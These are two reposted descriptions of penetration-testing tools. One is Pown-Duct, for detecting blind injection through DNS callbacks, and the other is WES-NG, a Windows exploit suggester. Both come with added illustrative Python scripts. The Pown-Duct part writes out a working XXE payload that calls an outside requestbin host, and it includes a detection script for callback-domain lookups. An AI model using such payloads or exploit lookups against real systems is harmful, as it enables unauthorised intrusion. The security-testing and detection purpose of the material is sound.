Pown-Duct – Essential Tool For Finding Blind Injection Attacks

Essential tool for finding blind injection attacks using DNS side-channels.

Credits

This tool is part of the secapps.com open-source initiative (https://secapps.com).

NB: This tool takes advantage of the http://requestbin.net service. Future versions will use a dedicated, custom-built infrastructure.

Quickstart

This tool is meant to be used as part of Pown.js, but it can be invoked separately as an independent tool.

Install Pown first as usual:

    $ npm install -g pown@latest

Invoke directly from Pown:

    $ pown duct

Otherwise, install this module locally from the root of your project:

    $ npm install @pown/duct --save

Once done, invoke the pown cli:

    $ ./node_modules/.bin/pown-cli duct

You can also use the global pown to invoke the tool locally:

    $ POWN_ROOT=. pown duct

Usage

    pown duct

    Side-channel attack enabler

    Commands:
      pown duct dns  DNS ducting

    Options:
      --version  Show version number  [boolean]
      --help     Show help            [boolean]

    pown duct dns

    DNS ducting

    Options:
      --version  Show version number  [boolean]
      --help     Show help            [boolean]
      --channel  Restore channel      [string]
      --output   Output format        [string] [choices: "string", "hexdump", "json"] [default: "string"]

Tutorial

There are cases when we need to perform an attack such as SQL injection, XSS, XXE or SSRF, but the target application does not provide any indication that it is vulnerable. One way to be sure whether a vulnerability is present is to inject a valid attack vector which forces a DNS resolver to look up a domain we control. If the resolution succeeds, the attack is considered successful.

NOTE: You might be familiar with Burp Collaborator, which provides a similar service for its customers.

First, we need a disposable DNS name to resolve:

    $ pown duct dns

Using the provided DNS name, compose your payload. For example, the following could trigger a DNS resolution if an XXE vulnerability is present.

    <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">]><foo>&bar;</foo>

If the attack was successful, we will get a message in the terminal.

Download Pown-Duct
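The flip side of the technique above is that a DNS side-channel leaves a trace in the victim's resolver logs: a lookup of a throwaway name under a callback service. The following is an added example, not part of Pown-Duct, that scans resolver query log lines for such lookups and recovers the "channel" token in front of the service suffix, which is what ties a resolution back to a particular injected payload. The log line format and the sample lines are constructed for the example; requestbin.net is the service the tool uses, while burpcollaborator.net and oastify.com are assumed additional suffixes to watch.

```python
"""Flag resolver queries to DNS side-channel callback services.

Added example, not part of Pown-Duct. It assumes a simple one-line-per-query
resolver log format (constructed below) and a list of callback domains to watch;
requestbin.net is the service named by the tool, the other suffixes are assumed.
"""
import re
from collections import defaultdict

# Callback services whose resolution from inside a network is worth alerting on.
CALLBACK_SUFFIXES = ("requestbin.net", "burpcollaborator.net", "oastify.com")

# Constructed log format: "<timestamp> client <ip> query: <qname> <qtype>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) client (?P<client>\d{1,3}(?:\.\d{1,3}){3}) "
    r"query: (?P<qname>\S+) (?P<qtype>\w+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["qname"] = rec["qname"].rstrip(".").lower()  # drop the trailing root dot
    return rec


def callback_suffix(qname):
    """Return the matching callback suffix for qname, or None.

    The check is label-aware: 'notrequestbin.net' must not match 'requestbin.net'.
    """
    for suffix in CALLBACK_SUFFIXES:
        if qname == suffix or qname.endswith("." + suffix):
            return suffix
    return None


def find_callbacks(lines):
    """Return (client, channel, suffix, timestamp) for every query to a callback service.

    'channel' is whatever precedes the suffix: the unique token embedded in the
    payload, which is what lets the tester (or attacker) tell which injection fired.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        suffix = callback_suffix(rec["qname"])
        if suffix is None:
            continue
        channel = rec["qname"][: -len(suffix)].rstrip(".")
        hits.append((rec["client"], channel, suffix, rec["ts"]))
    return hits


def clients_by_suffix(hits):
    """Group the internal clients that resolved each callback service."""
    grouped = defaultdict(set)
    for client, _channel, suffix, _ts in hits:
        grouped[suffix].add(client)
    return {suffix: sorted(clients) for suffix, clients in grouped.items()}


# Constructed sample log; the requestbin name is the one from the XXE payload above.
SAMPLE_LOG = [
    "2019-05-01T10:00:01Z client 10.0.0.5 query: www.example.com A",
    "2019-05-01T10:00:02Z client 10.0.0.7 query: showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net. A",
    "2019-05-01T10:00:03Z client 10.0.0.7 query: notrequestbin.net A",
    "this line is malformed and is skipped",
    "2019-05-01T10:00:04Z client 10.0.0.9 query: abc123.burpcollaborator.net A",
]

if __name__ == "__main__":
    for client, channel, suffix, ts in find_callbacks(SAMPLE_LOG):
        print(f"{ts} {client} resolved channel {channel!r} via {suffix}")
    print(clients_by_suffix(find_callbacks(SAMPLE_LOG)))
```

The suffix match is deliberately label-aware so that unrelated domains sharing a trailing string do not trigger; the client address tells you which internal host actually performed the lookup, which for XXE or SSRF is the application server rather than the user's browser.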

Link: http://feedproxy.google.com/~r/PentestTools/~3/mkfG1rnLQZQ/pown-duct-essential-tool-for-finding.html

Wesng – Windows Exploit Suggester

WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.

Usage

1. Obtain the latest database of vulnerabilities by executing the command wes.py --update.
2. Use Windows' built-in systeminfo.exe tool to obtain the system information of the local system, or of a remote system using systeminfo.exe /S MyRemoteHost, and redirect it to a file: systeminfo > systeminfo.txt
3. Execute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt. WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities it is currently exposed, including exploits if available.

As the data provided by Microsoft is frequently incomplete and false positives are reported by wes.py, make sure to check the Eliminating false positives page at the Wiki on how to deal with this. For an overview of all available parameters, check CMDLINE.md.

Collector

This GitHub repository regularly updates the database of vulnerabilities, so running wes.py with the --update parameter gets the latest version. If manual generation of the .csv file with hotfix information is required, use the scripts from the /collector folder to compile the database. Read the comments at the top of each script and execute them in the order in which they are listed below. Executing these scripts will produce CVEs.csv.

The WES-NG collector pulls information from various sources:

- Microsoft Security Bulletin Data: KBs for older systems [1]
- MSRC: the Microsoft Security Update API of the Microsoft Security Response Center (MSRC), the standard source of information for modern Microsoft updates [2]
- NIST National Vulnerability Database (NVD): complements vulnerabilities with Exploit-DB links [3]

These are combined into a single .csv file which is compressed and hosted in this GitHub repository.

Rationale

I developed WES-NG because, while GDSSecurity's Windows-Exploit-Suggester worked excellently for operating systems of the Windows XP and Windows Vista era, it does not work for operating systems like Windows 10 and vulnerabilities published in recent years. This is because Microsoft replaced the Microsoft Security Bulletin Data Excel file [1], on which GDSSecurity's Windows-Exploit-Suggester is fully dependent, by the MSRC API [2]. The Microsoft Security Bulletin Data Excel file has not been updated since Q1 2017, so later operating systems and vulnerabilities cannot be detected. Thanks @gdssecurity, for this great tool which has served many of us for so many years!

Bugs

Bugs can be submitted via the Issues page. For false positives in results, please read the Eliminating false positives page at the Wiki first. In case that doesn't significantly reduce the number of false positives, follow the steps at the Report false positives page on the Wiki.

Changelog

See CHANGELOG.md

Improvements

- Add support for NoPowerShell's Get-SystemInfo cmdlet output
- Add support for wmic qfe output together with support for parameters to manually specify the operating system
- Add support for alternative output formats of systeminfo (csv, table)
- More testing on the returned false positive vulnerabilities; see also the wiki
- Add support for Itanium architecture

References

[1] https://www.microsoft.com/download/details.aspx?id=36982
[2] https://portal.msrc.microsoft.com/en-us/developer
[3] https://nvd.nist.gov/vuln/data-feeds

Authored by Arris Huijgen (@bitsadmin – https://github.com/bitsadmin/)

Download Wesng
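The three usage steps above boil down to one matching problem: parse the build number and installed KBs out of systeminfo output, then compare them with a table of fixing updates. The following is an added example of that workflow; it is not WES-NG's own code, the CSV layout is constructed rather than the project's CVEs.csv format, and every KB and CVE number in it is a placeholder. The systeminfo excerpt follows the field layout the real tool prints, but its values are constructed. It also shows the step that the page's false-positive discussion turns on: an installed cumulative update that supersedes the original fix has to count as patched.

```python
"""List CVEs whose fixing update is missing from a systeminfo dump.

Added example illustrating the WES-NG workflow described above (systeminfo.txt in,
missing patches out). It is not WES-NG's code: the CSV layout and every KB and CVE
number below are constructed placeholders, not the project's CVEs.csv format.
"""
import csv
import io
import re

KB_RE = re.compile(r"\bKB(\d+)\b", re.IGNORECASE)
BUILD_RE = re.compile(r"Build (\d+)")


def parse_systeminfo(text):
    """Pull OS name, build number, architecture and installed KBs out of systeminfo output."""
    info = {"os_name": None, "build": None, "arch": None, "hotfixes": set()}
    in_hotfixes = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("OS Name:"):
            info["os_name"] = line.split(":", 1)[1].strip()
        elif line.startswith("OS Version:"):
            m = BUILD_RE.search(line)
            if m:
                info["build"] = int(m.group(1))
        elif line.startswith("System Type:"):
            info["arch"] = "x64" if "x64" in line else "x86"
        elif line.startswith("Hotfix(s):"):
            in_hotfixes = True  # the following "[nn]: KBxxxxxx" lines belong to this field
        elif in_hotfixes and line.startswith("["):
            m = KB_RE.search(line)
            if m:
                info["hotfixes"].add(int(m.group(1)))
        else:
            in_hotfixes = False  # any other field (e.g. Network Card(s)) ends the hotfix list
    return info


def load_table(csv_text):
    """Load the (constructed) vulnerability table: one row per CVE and affected build."""
    rows = []
    for r in csv.DictReader(io.StringIO(csv_text)):
        rows.append({
            "cve": r["cve"],
            "build": int(r["build"]),
            "fixing_kb": int(r["fixing_kb"]),
            "superseded_by": {int(k) for k in r["superseded_by"].split(";") if k},
            "exploit": r["exploit"] or None,
        })
    return rows


def missing_patches(info, table):
    """Rows for this build whose fix, or any update superseding it, is not installed.

    Supersedence is the step that matters: an installed cumulative update that
    replaces the original fix must count as patched, otherwise the CVE is reported
    as a false positive.
    """
    installed = info["hotfixes"]
    return [
        row for row in table
        if row["build"] == info["build"]
        and row["fixing_kb"] not in installed
        and not (row["superseded_by"] & installed)
    ]


# Constructed systeminfo.txt excerpt (field layout as systeminfo prints it).
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN10-TEST
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17763 N/A Build 17763
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB9000001
                           [02]: KB9000003
Network Card(s):           1 NIC(s) Installed.
                           [01]: Example Ethernet Adapter
"""

# Constructed table; CVE ids and KB numbers are placeholders.
VULN_TABLE_CSV = """\
cve,build,fixing_kb,superseded_by,exploit
CVE-0000-0001,17763,9000001,,
CVE-0000-0002,17763,9000002,9000003,
CVE-0000-0003,17763,9000004,9000005,https://example.invalid/poc-placeholder
CVE-0000-0004,17134,9000006,,
"""

if __name__ == "__main__":
    host = parse_systeminfo(SAMPLE_SYSTEMINFO)
    for row in missing_patches(host, load_table(VULN_TABLE_CSV)):
        print(row["cve"], "missing KB%d" % row["fixing_kb"], row["exploit"] or "")
```

In the sample, CVE-0000-0001 is fixed directly, CVE-0000-0002 is fixed only through the superseding KB9000003, CVE-0000-0004 belongs to another build, and only CVE-0000-0003 is reported. If the supersedence column were incomplete, CVE-0000-0002 would surface as a false positive, which is the situation the Eliminating false positives wiki page addresses.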

Link: http://feedproxy.google.com/~r/PentestTools/~3/S-0NXhKzPf0/wesng-windows-exploit-suggester.html